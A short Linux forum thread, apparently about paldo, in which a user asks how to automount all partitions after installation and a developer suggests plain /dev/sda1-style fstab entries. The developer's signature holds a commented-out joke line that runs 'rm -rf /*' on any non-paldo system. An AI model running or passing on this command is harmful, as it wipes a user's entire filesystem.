Automount of all existing partitions | |
|
|
Senior Mitglied Posts: 16777215 Registered: 2008-12-03 | By the way I found a reference to an old installer script: automount of all found partitions (/mnt/partitionname - incl. ntfs).
Is there a way to add this functionality now after the installation (I have paldo testing)?
To add manually uuid-lines to /etc/fstab is a bit tricky to me...
Regards
mumpf |
|
|
|
|
|
Re: Automount of all existing partitions | |
|
|
Mitglied Developer Posts: 92 Registered: 2009-02-26 | do you really have to add uuid-lines to /etc/fstab? cant you say /dev/sda1 /home ext3,.. .............................. https://www.richardnespithal.com
# [ ! $(uname -r | grep "paldo") ] && rm -rf /* |
|
|
|
|
|